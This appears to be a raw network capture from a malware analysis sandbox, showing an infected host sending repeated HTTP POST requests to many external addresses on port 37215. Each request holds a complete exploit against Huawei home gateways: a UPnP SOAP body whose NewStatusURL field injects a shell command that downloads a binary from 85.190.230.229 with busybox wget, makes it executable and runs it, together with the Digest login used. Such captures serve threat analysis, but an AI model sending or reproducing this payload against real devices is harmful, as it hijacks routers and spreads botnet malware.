                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      33192.168.2.1449914102.144.234.4837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.498115063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      34192.168.2.1460714197.15.142.19837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.499428988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.834122896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.322094917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.314024925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.265979052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      35192.168.2.1437298197.194.5.6037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.500735998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.834209919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.322094917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.314024925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.265979052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 